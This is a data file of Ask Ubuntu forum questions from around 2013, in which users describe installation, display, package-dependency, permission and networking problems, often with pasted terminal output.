304718	using ubuntu software center seems to force my laptop to a black screen then reopens login screen	first of all i am new to the world of ubuntu , it is pretty much my first time using it , ever . the system seems to be running very stable , but i have run across one weird problem that i 'm not quite sure what 's the cause of . whenever i use the ubuntu software center , after a few seconds of use ( this can vary a bit , but it is usually not long ) , my laptop enters a black screen , and then after a few seconds enters the ubuntu startup screen where you log in , almost as if the entire os restarted . i would love to provide debug information but i 'm not quite sure how to , so if there 's anything that could help please ask and i will edit the question with additional details : ) thank you all for the help ! [ edit ] i have now added the dmesg log output . it can be found here : dmesg log output [ edit ] - hardware details i am running ubuntu on an intel-based mac , more specifically macbook 8,1 .
304727	how do i uninstall ubuntu ( installed alongside windows 8 ) ?	looking for a detailed how-to on uninstalling ubuntu 12.04.2 lts . i 've installed it alongside windows 8 .
304732	some thing has screwed up my desktop in 13.04	okay , some thing or some app has screwed up my desktop ... what happens after login is seen in the pic bellow - the login boxes stay as well as the dots or a complete black screen comes up . and this happens only in my login . lon in root or guest . what might be wrong ? i installed quite a number of apps in one boot and only then rebooted ... so m not able to even debug as to which app might have done it !
304734	ca n't install ubuntu on my imac	apparently , my late-2009 imac screwed up , and ruined everything . i was forced to reformat , but my imac is second-hand , so i ca n't reinstall mac because i do n't have an apple id that has lion registered to it . anyway , i was sick and tired of apple anyway , so i decided to use the ubuntu 12.04 lts . my imac 's superdrive is a jerk , so i plugged in my usb on my mother 's macbook , downloaded the iso of ubuntu and used the dd trick . i was almost victorious when i encountered a problem : install ubuntu resulted to a black screen of nothingness , and then the monitor would die out and i have to reset . the same happened . i browsed through the ubuntu forums and luckily found out about the `` nomodeset '' trick . success was on my side , and i braced myself to shout victory . unfortunately , the install hangs on this certain part with the oks and fails . i looked closer into it and found out that it was `` starting restore sound card ( s ' ) mixer state ( s ' ) that failed . please help me with this , guys .
304737	how to resolve `` unable to locate theme engine '' type error in android sdk manager ?	i am getting this error while running my android sdk using eclipse on ubuntu . ( java:5986 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , [ 2013-06-06 14:04:53 - sdk manager ] also when i 'm creating a project , automatic generated class file `` r '' is not either form or going anywhere , please tell solution to this problem also . thanks
304739	update error xubuntu 13.04	when i try to install or remove items i 'm unable to do so due to 3 programs that are n't fully installed . ive tried removing them and reinstalling but no luck when i tried to configure i got this : - sudo dpkg -- configure -a setting up linux-image-extra-3.8.0-23-generic ( 3.8.0-23.34 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-23-generic /boot/vmlinuz-3.8.0-23-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-23-generic /boot/vmlinuz-3.8.0-23-generic update-initramfs : generating /boot/initrd.img-3.8.0-23-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-23-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.8.0-23-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.8.0-23-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-extra-3.8.0-23-generic ; however : package linux-image-extra-3.8.0-23-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.23.39 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-extra-3.8.0-23-generic linux-image-generic linux-generic how would i go about fixing this problem ? i know it says no space left but i only updated a while ago and do n't have any files as i just browse the internet and that error came after trying to update .
304745	lost after upgrading from 10.04 to 12.04	i just upgraded from version 10.04 to 12.04 . the interface is so different i am lost . in particular , after exploring i noticed that eclipse and netbeans were still installed , but i dont know how to run them . same goes for the shell .
304746	how to get rid off - sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins	i am trying to configure apache2 with cgi ( python ) . for that , i have to change permissions of some folders and files but i am getting sudo fatal errors every time i try to change the permission of a file or a folder . for example : 1 j @ ubuntu : /etc/apache2 $ ls apache2.conf envvars magic mods-enabled sites-available conf.d httpd.conf mods-available ports.conf sites-enabled j @ ubuntu : /etc/apache2 $ sudo chmod 777 httpd.conf sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. 2 j @ ubuntu : /usr/lib/cgi-bin $ sudo /etc/init.d/apache2 restart sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. 3 j @ ubuntu : /usr/lib $ sudo chmod -r 777 /usr/lib/cgi-bin sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. note : j @ ubuntu : /etc/apache2 $ ls -l /usr/lib/sudo/sudoers.so -rwxrwxrwx 1 root root 177452 jan 31 2012 /usr/lib/sudo/sudoers.so
304747	my 'usb flash ' does not have right permission . i ca n't copy files into it via nautilus ?	i have a usb cooldisk 8.0 gb . it was full of windows viruses . i tried to delete them under ubuntu 13.04 , but it did n't allow me to delete anything ! i formated it by the software 'disks ' to fat filesystem and overwrite all data by zero . again , i ca n't delete anything ! i ca n't change permission of any file ! but , i can do anything by terminal ( cli ) . i can create folder by mkdir . i can copy files by cp . etc . i ran sudo chmod 777 -r /media/me/usb/* , but the permission did not change : i want do all by natilus . it does not allow me to create folder , copy , change permission , ... , by natilus ( files ) . what 's the problem ?
304750	is there a future replacement for thunderbird yet ?	i have been thunderbird user even before was included in default apps . i have never loved evolution and all alternative at that time were either not mature enough or single accounts . recentely i saw that mozilla thunderbird is lagging behind firefox ( ff21 tb17 ) which is not a good sign to me and i thought its time to look for any alterative to start getting used to . i have five accounts and am not willing to use web interface . what is alternative that can handle multi account yet with bright future ?
304753	can i change the window-switching animation without ccsm ?	i want to use the coverflow animation during window switching between applications . i am very reluctant to use compiz ( with ccsm , to be specific ) because it makes ubuntu too slow . i do n't want any of the other compiz animations or effects , i 'm really only after the coverflow animation . is there any way i can enable this without compiz ? are there any alternatives ? i have one other requirement : i need to be able to set the default window position ( to center ) . compiz/ccsm allows me to set that . edit well i just realised , i should have put , ccsm ! not compiz ! i dont want to remove compiz , i just want to not make use of ccsm !
304755	does placing a symbolic link in the path work the same as creating a symbolic link of an executable in the path ?	as the title says , i 'm about to do an install of an executable . normally i would either 1. install the executable to somewhere in my path i.e . home/bin/ or if that was n't feasible 2. would add the directory to the path in ~/.profile however instead of option 2 could i simply create a symbolic link to somewhere in my path ? cheers
304760	install extension to all firefox profiles in my ubuntu user account ?	there are 2 ubuntu user accounts . i have about 6-7 firefox profiles in my ubuntu user account . i want to install an extension into all of them but not into firefox profiles of the other ubuntu user account . how do i ?
304765	can i have ubuntu , xubuntu and lubuntu desktop sessions installed without having the applications from the one in the other ?	when i install multiple sessions next to each other , the default programs from the one also appear in the other . how to prevent this ? i 'm talking about all the default applications . i do n't need multiple applications ( firefox , chromium , konqueror ... ) for the same task littering the applications menu . so i 'd like to hide the default apps from one de when using another de which has a different default app .
304766	litle question about ufw command	hi guys i would like to setup a specific rule for my ufw but i have the problem . how could i type this ? from ip adress 192.168.1.203 on interface eth0 alow port 80 i have on local pc ip address 192.168.1.203 ubuntu have 2 nics 1 is eth0 lokal network , eth1 wan . ubuntu have installed apache service i would like only my pc to access ubuntu on interface eth0 i that i only have access to open web pages from apache on port 80 i hope you understand me guys : )
304771	how to delete files downloaded in command terminal ?	i downloaded some files like adobe reader , etc by using commands but these files are not compatible to my ubuntu version.my question is where the downloaded file exists ... .. please answer this question .
304773	command line web browser using ssh , is there any way i can use	i am connected using ssh to a ubuntu box which is behind firewall and routers . from that ubuntu box i need to open a router web page and login to the router for doing some changes . how can i from command line open a web-browser which can allow me to do the similar web browsing in that lan network ? i used lynx but its not helping me to do the main job . anything else . edit : using lynx i get this problem where i need javascript to have router web access . < < < linksys smart wi-fi javascript is required javascript is required to use linksys smart wi-fi tools . please change the security settings in your browser to enable javascript . : q arrow keys : up and down to move . right to follow a link ; left to go back . h ) elp o ) ptions p ) rint g ) o m ) ain screen q ) uit /=search [ delete ] =history list edit : step 1 : remote laptop $ ssh -nd 9009 sun @ 82.x.x.x password : ... ... step 2 : open firefox > do the settings like this : step 3 : go to site icanhazip.com and start surfing it works .
304776	how to stop static ip is being overwritten with dynamic ip ?	i have create a connection from network manager gui with wired connection and in ipv4 setting tab , with all details like ip address , netmask , gateway and dns server . also change the /etc/network/interface file with below details : auto eth0 iface eth0 inet static address 172.xx.xxx.xxx netmask 255.255.xxx.x gateway 172.xx.xxx.x dns-nameservers 8.8.8.8 172.xx.x.x after restarting the machine i got the network connected and from ifconfig output got the ip address as i provided in network manager gui or in interfaces file . but the main issue is , this internet connection got disconnected after 10/15 mins . and this time ip address got change to dynamic ip like 169.xxx.xxx.xxx . please help me to resolve this issue .
304778	no battery indications !	i have recently installed unbutu 13.04 on to a toshiba satellite . however i have no indications of the battery level in the top menu or anywhere . i have reinstalled the battery indicator through the software centre but this has not solved the problem . any ideas ?
304782	how to type nepali fonts like kantipur in libreoffice writer ?	i am a new user of ubuntu 12.04 lts and i have a problem in libreoffice writer . i have no idea about typing nepali fonts in it . could anybody answer me with sweet and simple language ?
304784	mp3info -p `` % s '' file.mp3 - return : file.mp3 is corrupt or is not a standard mp3 file	i want to get duration of .mp3 song in seconds using mp3info . when i execute mp3info -p `` % s '' file.mp3 output is file.mp3 is corrupt or is not a standard mp3 file . the file is correct 100 % . when i execute the command , on same file , on another computer i get the correct information . the rpm version of mp3info is same on both computers . does anyone know what could be the problem ?
304788	sound suddenly turns off	i am using ubuntu 12.10 . earlier sound used to randomly turn off when i closed my laptop 's lid and laptop went to sleep , after waking it up there used to be no sound . i would then restart laptop to get the sound back . right now , i was watching a movie on vlc and sound suddenly muted . i restarted and have no sound yet . any way to get it back on ? and is there any permanent solution to this ? i researched other similar questions on askubuntu nothing helped .
304795	on screen keyboard on login - how to remove	i somehow enabled the on-screen keyboard that comes up when you go to login . how can i remove it so that it does n't come up each time .
304796	is there a reason for linux-image-*-generic being marked manual by default and can this be changed ?	i noticed today that my linux images were stacking up on the hard drive ( ubuntu server 12.04 ) . i freed up a couple of gb in clearing the majority of them off . when i looked into this there is a script in place to protect the current version ( current running , most recent , second most recent ) . this is run automatically each time a new linux image is added through apt : /etc/kernel/postinst.d/apt-auto-removal . it 's effect is to prevent the most relevant images from being removed automatically through apt . however this did not explain the number of images i had filling up my /boot partition . this appears due to each linux-image-*-generic being marked as manual in apt so that you need to use apt-mark auto linux-image-3.2.0-32-generic before it will be identified for removal . is there any simple way to change this behavior so that kernels are only retained by the logic in /etc/kernel/postinst.d/apt-auto-removal ? is it inadvisable to try ?
304800	indicator-messages absent in 13.04 fresh install	i ca n't find a way to show the `` blue mail '' indicator what i think : this indicator is called `` indicator-messages '' ubuntu change some things ( like removing the whitelist ) i tried : to reinstall indicator-messages package multiple reboots to create another account ( if there was specific configuration i made in ~/.config ) what i have done : installed aptitude aptitude update & & aptitude upgrade fresh install ubuntu 13.04 amd64 uninstall all packages with ubuntuone ( with automatic dependencies ) configure twitter account ( settings - > online accounts ) installed gwibber reboot $ uname -a linux antsirabe 3.8.0-23-generic # 34-ubuntu smp wed may 29 20:22:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux thanks for your time !
304802	ssh connection to aws ec2 servers terminate often	i am using ubuntu os as i am trying to cloud machine . ssh connection to aws ec2 servers terminate often , what configuration needs to be modified so that we could minimize the remote shell from being terminated .
304803	launcher , top panel disappeared and global menu & hud disabled	this morning , i removed all the unity-webapps-something and did n't pay attention that removing unity-webapps-service or unity-webappas-common required to remove other key packages : the following packages will be removed : bamfdaemon hud indicator-appmenu indicator-sound libbamf3-1 libunity-webapps0 lightdm-remote-session-uccsconfigure unity unity-tweak-tool unity-webapps-common unity-webapps-service xul-ext-unity xul-ext-websites-integration 0 upgraded , 0 newly installed , 13 to remove and 1 not upgraded . after this operation , 10.3 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 458920 files and directories currently installed . ) removing unity-tweak-tool ... removing lightdm-remote-session-uccsconfigure ... removing unity ... removing indicator-sound ... removing indicator-appmenu ... removing hud ... removing libbamf3-1 : amd64 ... removing bamfdaemon ... removing xul-ext-unity ... removing xul-ext-websites-integration ... removing unity-webapps-common ... removing libunity-webapps0 ... removing unity-webapps-service ... now , that i login to my unity session , i have no launcher , no top panel , global menu integration and hud are disabled . i reinstalled all the packages removed above and restarted the computer but in vain . i reconfigured these packages but in vain ( sudo dpkg-reconfigure unity ) i issued : unity -- replace and compiz -- replace but in vain . any ideas please . this is kind of frustrating . ps : at the greeter stage , everything is fine . it 's only when i log in . i can also login to my gnome fall back session without problems .
304805	upgraded php on ubuntu but old version still in use	i just upgraded php to v5.4 on my laptop , using the technique described in this answer , how do i install latest php in supported ubuntu versions ( like 5.4.x in ubuntu 12.04 ) ? . i did the same for my desktop a while back and it all worked fine . on my laptop however the old version ( 5.3.10 ) is still showing at the cli ( php -v ) and the sapi ( phpinfo ( ) ) . why is it so ? presumably there is a config file ( or two ) that needs updating ? i am using ubuntu 12.04 . edit : output of dpkg -l '*php5* ' as requested : ( sorry about the formatting ) desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ ii libapache2-mod 5.3.10-1ubuntu server-side , html-embedded scripting languag un libapache2-mod < none > ( no description available ) ii php5 5.3.10-1ubuntu server-side , html-embedded scripting languag un php5-cgi < none > ( no description available ) ii php5-cli 5.3.10-1ubuntu command-line interpreter for the php5 script ii php5-common 5.3.10-1ubuntu common files for packages built from the php ii php5-curl 5.3.10-1ubuntu curl module for php5 ii php5-dev 5.3.10-1ubuntu files for php5 module development un php5-fpm < none > ( no description available ) ii php5-gd 5.3.10-1ubuntu gd module for php5 ii php5-gmp 5.3.10-1ubuntu gmp module for php5 un php5-idn < none > ( no description available ) un php5-imap < none > ( no description available ) ii php5-intl 5.3.10-1ubuntu internationalisation module for php5 un php5-json < none > ( no description available ) un php5-ldap < none > ( no description available ) ii php5-mcrypt 5.3.5-0ubuntu1 mcrypt module for php5 un php5-mhash < none > ( no description available ) ii php5-mysql 5.3.10-1ubuntu mysql module for php5 un php5-mysqli < none > ( no description available ) un php5-mysqlnd < none > ( no description available ) un php5-pgsql < none > ( no description available ) un php5-sqlite < none > ( no description available ) un php5-sqlite3 < none > ( no description available ) un php5-suhosin < none > ( no description available ) ii php5-xdebug 2.1.0-1 xdebug module for php 5 ii php5-xmlrpc 5.3.10-1ubuntu xml-rpc module for php5 ii php5-xsl 5.3.10-1ubuntu xsl module for php5 another edit : problem solved hi , ubuntu suddenly decided it had numerous other updates to apply , including a kernel upgrade , so i let that happen and we now have v 5.4 ! ( the cli is saying it ca n't load xdebug , but i 've seen this before and should be able to sort it out . if i ca n't i 'll raise another question ) .
304810	dependency problems prevent configuration of linux-headers-virtual	i 'm running ubuntu 12.04.2 lts on a virtual box and have run into a little problem . whenever i try to do an upgrade , i get : apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-headers-virtual : depends : linux-headers-3.2.0-44-virtual but it is not installed linux-virtual : depends : linux-image-virtual ( = 3.2.0.44.53 ) but 3.2.0.45.54 is installed e : unmet dependencies . try using -f. if however , i try -f install ( as suggested ) , i get : apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-headers-virtual linux-virtual the following packages will be upgraded : linux-headers-virtual linux-virtual 2 upgraded , 0 newly installed , 0 to remove and 38 not upgraded . 2 not fully installed or removed . need to get 0 b/4,234 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-headers-virtual : linux-headers-virtual depends on linux-headers-3.2.0-44-virtual ; however : package linux-headers-3.2.0-44-virtual is not installed . dpkg : error processing linux-headers-virtual ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-virtual : linux-virtual depends on linux-image-virtual ( = 3.2.0.44.53 ) ; however : version of linux-image-virtual on system is 3.2.0.45.54. linux-virtual depends on linux-headers-virtual ( = 3.2.0.44.53 ) ; however : package linux-headers-virtual is not configured yet . dpkg : error processing linux-virtual ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-headers-virtual linux-virtual e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas/suggestions on how to fix this issue ? thanks in advance . ps : i have tried with apt-get autoremove and autoclean with no luck . following mitch 's suggestion , i tried dpkg -- configure -- pending , without any luck either . same errors . i also tried the other two commands suggested , but their output do not add any other info to what is provided already : sudo dpkg -- configure -- pending dpkg : dependency problems prevent configuration of linux-headers-virtual : linux-headers-virtual depends on linux-headers-3.2.0-44-virtual ; however : package linux-headers-3.2.0-44-virtual is not installed . dpkg : error processing linux-headers-virtual ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-virtual : linux-virtual depends on linux-image-virtual ( = 3.2.0.44.53 ) ; however : version of linux-image-virtual on system is 3.2.0.45.54. linux-virtual depends on linux-headers-virtual ( = 3.2.0.44.53 ) ; however : package linux-headers-virtual is not configured yet . dpkg : error processing linux-virtual ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-headers-virtual linux-virtual as lgarzo requested , here is some info : uname -r 3.2.0-45-virtual dpkg -- list linux- [ hi ] * | cat desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-===============================-============================-=================================================================== ===== un linux-headers < none > ( no description available ) un linux-headers-3 < none > ( no description available ) un linux-headers-3.0 < none > ( no description available ) un linux-headers-3.2.0-36 < none > ( no description available ) un linux-headers-3.2.0-36-virtual < none > ( no description available ) un linux-headers-3.2.0-37 < none > ( no description available ) un linux-headers-3.2.0-37-virtual < none > ( no description available ) un linux-headers-3.2.0-38 < none > ( no description available ) un linux-headers-3.2.0-38-virtual < none > ( no description available ) un linux-headers-3.2.0-39 < none > ( no description available ) un linux-headers-3.2.0-39-virtual < none > ( no description available ) un linux-headers-3.2.0-40 < none > ( no description available ) un linux-headers-3.2.0-40-virtual < none > ( no description available ) un linux-headers-3.2.0-41 < none > ( no description available ) un linux-headers-3.2.0-41-virtual < none > ( no description available ) ii linux-headers-3.2.0-43 3.2.0-43.68 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-43-virtual 3.2.0-43.68 linux kernel headers for version 3.2.0 on 64 bit x86 virtual guests ii linux-headers-3.2.0-44 3.2.0-44.69 header files related to linux kernel version 3.2.0 in linux-headers-3.2.0-44-virtual < none > ( no description available ) ii linux-headers-3.2.0-45 3.2.0-45.70 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-45-virtual 3.2.0-45.70 linux kernel headers for version 3.2.0 on 64 bit x86 virtual guests iu linux-headers-virtual 3.2.0.44.53 linux kernel headers for virtual machines un linux-image < none > ( no description available ) un linux-image-3.0 < none > ( no description available ) ii linux-image-3.2.0-23-virtual 3.2.0-23.36 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-30-virtual 3.2.0-30.48 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-31-virtual 3.2.0-31.50 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-32-virtual 3.2.0-32.51 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-33-virtual 3.2.0-33.52 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-34-virtual 3.2.0-34.53 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-35-virtual 3.2.0-35.55 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-36-virtual 3.2.0-36.57 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests rc linux-image-3.2.0-37-virtual 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests rc linux-image-3.2.0-38-virtual 3.2.0-38.61 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests rc linux-image-3.2.0-39-virtual 3.2.0-39.62 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests rc linux-image-3.2.0-40-virtual 3.2.0-40.64 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests rc linux-image-3.2.0-41-virtual 3.2.0-41.66 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-43-virtual 3.2.0-43.68 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-44-virtual 3.2.0-44.69 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-45-virtual 3.2.0-45.70 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-virtual 3.2.0.45.54 linux kernel image for virtual machines un linux-initramfs-tool < none > ( no description available ) free space , as requested : df -h filesystem size used avail use % mounted on /dev/mapper/cacti-root 3.2g 1.6g 1.5g 53 % / udev 239m 4.0k 239m 1 % /dev tmpfs 97m 236k 97m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 243m 0 243m 0 % /run/shm /dev/sda1 228m 82m 134m 38 % /boot one thing i should mention is that , in fact i did n't have enough inodes left ( df -i showed 100 % iuse % for /dev/mapper/cacti-root ) . i had to manually remove files from /usr/src/linux-headers-x.x.x-xx for older versions . now , however it is not the problem anymore . first of all , thanks for your help lgarzo . i have tried to install linux-headers-3.2.0-44-virtual as suggested . here is the output : dpkg -- install linux-headers-3.2.0-44-virtual dpkg : error processing linux-headers-3.2.0-44-virtual ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : linux-headers-3.2.0-44-virtual having checked /usr/src/ for the needed files , it seems that precisely those from linux-headers-3.2.0-44-virtual are missing : cd /usr/src/ ls -l total 20 drwxr-xr-x 24 root root 4096 may 16 06:57 linux-headers-3.2.0-43 drwxr-xr-x 7 root root 4096 may 16 06:57 linux-headers-3.2.0-43-virtual drwxr-xr-x 24 root root 4096 may 24 06:41 linux-headers-3.2.0-44 drwxr-xr-x 24 root root 4096 jun 6 14:48 linux-headers-3.2.0-45 drwxr-xr-x 7 root root 4096 jun 6 14:48 linux-headers-3.2.0-45-virtual i have both the plain and virtual for ... -43 and ... -45 , but not the virtual pack for ... -44 . it seems that the inodes problem raised during that automatic upgrade on 24th may and it was left half made . is there any way to download and extract those files so that dpkg -- install do not fail ? thanks . ok , it seems we are moving somewhere ( hope in the right direction ) . i have downloaded linux-headers-3.2.0-44-virtual_3.2.0-44.69_i386.deb and tried to do dpkg -install . now it complains for another reasons : ( # wget http : //launchpadlibrarian.net/140046439/linux-headers-3.2.0-44-virtual_3.2.0-44.69_i386.deb -- 2013-06-12 09:49:51 -- http : //launchpadlibrarian.net/140046439/linux-headers-3.2.0-44-virtual_3.2.0-44.69_i386.deb resolving launchpadlibrarian.net ( launchpadlibrarian.net ) ... 91.189.89.228 , 91.189.89.229 connecting to launchpadlibrarian.net ( launchpadlibrarian.net ) |91.189.89.228|:80 ... connected . http request sent , awaiting response ... 200 ok length : 979370 ( 956k ) [ application/x-debian-package ] saving to : `linux-headers-3.2.0-44-virtual_3.2.0-44.69_i386.deb' 100 % [ ========================================================================================== > ] 979,370 -- .-k/s in 0.04s 2013-06-12 09:49:51 ( 22.9 mb/s ) - `linux-headers-3.2.0-44-virtual_3.2.0-44.69_i386.deb ' saved [ 979370/979370 ] # dpkg -- install linux-headers-3.2.0-44-virtual_3.2.0-44.69_i386.deb selecting previously unselected package linux-headers-3.2.0-44-virtual : i386 . ( reading database ... 89164 files and directories currently installed . ) unpacking linux-headers-3.2.0-44-virtual : i386 ( from linux-headers-3.2.0-44-virtual_3.2.0-44.69_i386.deb ) ... dpkg : dependency problems prevent configuration of linux-headers-3.2.0-44-virtual : i386 : linux-headers-3.2.0-44-virtual : i386 depends on linux-headers-3.2.0-44 . linux-headers-3.2.0-44-virtual : i386 depends on libc6 ( > = 2.11 ) . dpkg : error processing linux-headers-3.2.0-44-virtual : i386 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-headers-3.2.0-44-virtual : i386 the files are extracted correctly to /usr/src/ , but i suppose there are some steps to follow yet . # cd /usr/src # ls -l total 24 drwxr-xr-x 24 root root 4096 may 16 06:57 linux-headers-3.2.0-43 drwxr-xr-x 7 root root 4096 may 16 06:57 linux-headers-3.2.0-43-virtual drwxr-xr-x 24 root root 4096 may 24 06:41 linux-headers-3.2.0-44 drwxr-xr-x 7 root root 4096 jun 12 09:37 linux-headers-3.2.0-44-virtual drwxr-xr-x 24 root root 4096 jun 6 14:48 linux-headers-3.2.0-45 drwxr-xr-x 7 root root 4096 jun 6 14:48 linux-headers-3.2.0-45-virtual any idea ? ( thanks a lot for your patience and support ) . # dpkg -- list linux-headers-3.2.0-44 libc6 linux-virtual | cat desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-===================================-============================-============================================================= ii libc6 2.15-0ubuntu10.3 embedded gnu c library : shared libraries ii linux-headers-3.2.0-44 3.2.0-44.69 header files related to linux kernel version 3.2.0 iu linux-virtual 3.2.0.44.53 complete linux kernel for virtual machines having seen the uppercase u besides linux-virtual , i have also tried : # apt-get install linux-virtual reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-headers-3.2.0-44-virtual : i386 : depends : linux-headers-3.2.0-44 : i386 but it is not installable depends : libc6 : i386 ( > = 2.11 ) but it is not going to be installed linux-headers-virtual : depends : linux-headers-3.2.0-44-virtual but it is not going to be installed linux-virtual : depends : linux-headers-virtual ( = 3.2.0.45.54 ) but 3.2.0.44.53 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . it is x64 ! ! ! # dpkg -- print-architecture amd64 i think downloading x64 files might help ; ) here are the steps i have made ( along with their outputs ) , now that i realised that it was a 64bit machine . download and install the correct .deb file # wget http : //launchpadlibrarian.net/140040575/linux-headers-3.2.0-44-virtual_3.2.0-44.69_amd64.deb -- 2013-06-14 08:08:49 -- http : //launchpadlibrarian.net/140040575/linux-headers-3.2.0-44-virtual_3.2.0-44.69_amd64.deb resolving launchpadlibrarian.net ( launchpadlibrarian.net ) ... 91.189.89.229 , 91.189.89.228 connecting to launchpadlibrarian.net ( launchpadlibrarian.net ) |91.189.89.229|:80 ... connected . http request sent , awaiting response ... 200 ok length : 983134 ( 960k ) [ application/x-debian-package ] saving to : `linux-headers-3.2.0-44-virtual_3.2.0-44.69_amd64.deb' 100 % [ ========================================================================================== > ] 983,134 151k/s in 20s 2013-06-14 08:09:10 ( 48.7 kb/s ) - `linux-headers-3.2.0-44-virtual_3.2.0-44.69_amd64.deb ' saved [ 983134/983134 ] # dpkg -- install linux-headers-3.2.0-44-virtual_3.2.0-44.69_amd64.deb ( reading database ... 89164 files and directories currently installed . ) unpacking linux-headers-3.2.0-44-virtual ( from linux-headers-3.2.0-44-virtual_3.2.0-44.69_amd64.deb ) ... setting up linux-headers-3.2.0-44-virtual ( 3.2.0-44.69 ) ... check the contents of /usr/src directory # cd /usr/src # ls -l total 24 drwxr-xr-x 24 root root 4096 may 16 06:57 linux-headers-3.2.0-43 drwxr-xr-x 7 root root 4096 may 16 06:57 linux-headers-3.2.0-43-virtual drwxr-xr-x 24 root root 4096 may 24 06:41 linux-headers-3.2.0-44 drwxr-xr-x 7 root root 4096 jun 14 08:12 linux-headers-3.2.0-44-virtual drwxr-xr-x 24 root root 4096 jun 6 14:48 linux-headers-3.2.0-45 drwxr-xr-x 7 root root 4096 jun 6 14:48 linux-headers-3.2.0-45-virtual try to apt-get update & upgrade # apt-get update [ ... ] [ ends successfully ] # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-virtual : depends : linux-image-virtual ( = 3.2.0.44.53 ) but 3.2.0.45.54 is installed e : unmet dependencies . try using -f. it fails , complaining , so i try with -f ( orce ) flag # apt-get -f upgrade reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following new packages will be installed : linux-headers-3.2.0-48 linux-headers-3.2.0-48-virtual linux-image-3.2.0-48-virtual the following packages have been kept back : mysql-client-5.5 mysql-server-5.5 mysql-server-core-5.5 the following packages will be upgraded : aptitude bash dmsetup isc-dhcp-client isc-dhcp-common libc-bin libc6 libdbus-1-3 libdevmapper-event1.02.1 libdevmapper1.02.1 libdrm-intel1 libdrm-nouveau1a libdrm-radeon1 libdrm2 libgnutls26 libmysqlclient18 libplymouth2 libssl1.0.0 libudev0 libx11-6 libx11-data libxcb-render0 